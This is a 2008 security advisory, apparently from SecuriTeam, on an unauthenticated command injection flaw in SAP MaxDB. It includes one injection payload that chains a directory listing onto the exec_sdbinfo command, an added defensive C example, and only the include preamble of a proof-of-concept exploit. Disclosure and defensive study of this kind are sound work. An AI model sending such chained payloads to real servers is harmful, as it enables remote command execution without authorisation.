Thursday, January 10, 2008

[NEWS] SAP MaxDB Pre-Auth Command Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com


- - - - - - - - -

SAP MaxDB Pre-Auth Command Execution
------------------------------------------------------------------------


SUMMARY

SAP MaxDB (<https://www.sdn.sap.com/irj/sdn/maxdb>) is "a commercial and
widely known and used database". A vulnerability in the way MaxDB invokes
system() allows remote, unauthenticated attackers to make the server
execute arbitrary commands.

DETAILS

Vulnerable Systems:
* SAP MaxDB version 7.6.03 build 007 and prior

The MaxDB server executes "cons.exe DATABASE COMMAND" through system()
when the user issues certain special commands, among them "show" and
"exec_sdbinfo". The latter is one of the few commands that unauthenticated
users are allowed to run before logging in.

Because the cons program is launched through system(), an external
unauthenticated attacker can execute any command on the target SAP MaxDB
server simply by appending "&&" or another shell sequence that chains
multiple commands.

It is therefore enough to send the following SAP command to list the
contents of C: on Windows (the bug is naturally exploitable on any other
platform supported by the server):

exec_sdbinfo && echo dir c:\ | cmd.exe

The rest, and every other way of exploiting this vulnerability, is left to
the attacker's imagination...
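The root cause above is a client-supplied command name being pasted into a string that reaches system(). The following added example (not MaxDB's code; the function names, the allowed character set and the database name "MAXDB" are assumptions) contrasts that vulnerable pattern with a version that validates the argument and builds an argv vector so no shell ever parses it.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Vulnerable pattern (hypothetical reconstruction): the command string is
 * interpolated verbatim, so a sequence such as "&&" inside cmd becomes a
 * second command once the string is handed to system().
 * Returns the length snprintf would have written. */
int build_cons_cmdline_unsafe(const char *db, const char *cmd,
                              char *out, size_t n)
{
    return snprintf(out, n, "cons.exe %s %s", db, cmd);
}

/* Defensive check (assumed policy): a console argument may only consist of
 * letters, digits and underscores and must stay short. Anything else is
 * rejected, so no shell metacharacter can ever be assembled. */
int cons_arg_is_safe(const char *arg)
{
    if (arg == NULL || *arg == '\0' || strlen(arg) > 64)
        return 0;
    for (const char *p = arg; *p != '\0'; p++) {
        if (!isalnum((unsigned char)*p) && *p != '_')
            return 0;
    }
    return 1;
}

/* Hardened launch plan: validate both arguments, then fill an argv vector
 * for execv()/CreateProcess()-style execution instead of a shell command
 * line. Returns the number of argv entries, or 0 when an argument was
 * rejected (argv is left untouched in that case). */
int build_cons_argv(const char *db, const char *cmd, const char *argv[4])
{
    if (!cons_arg_is_safe(db) || !cons_arg_is_safe(cmd))
        return 0;
    argv[0] = "cons.exe";
    argv[1] = db;
    argv[2] = cmd;
    argv[3] = NULL;   /* terminator expected by execv() */
    return 3;
}
```

The caller of build_cons_argv would pass the vector to fork()/execv() or an equivalent process-creation API; the point is that the command name is validated once and never reaches a shell.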

Exploit (only the preamble of the proof of concept is reproduced here; the
full source is in the zip linked below):
/*

by Luigi Auriemma - http://aluigi.org/poc/sapone.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
/* Windows build: Winsock and the author's winerr.h error helper */
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
/* POSIX build: BSD sockets */
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1
#endif
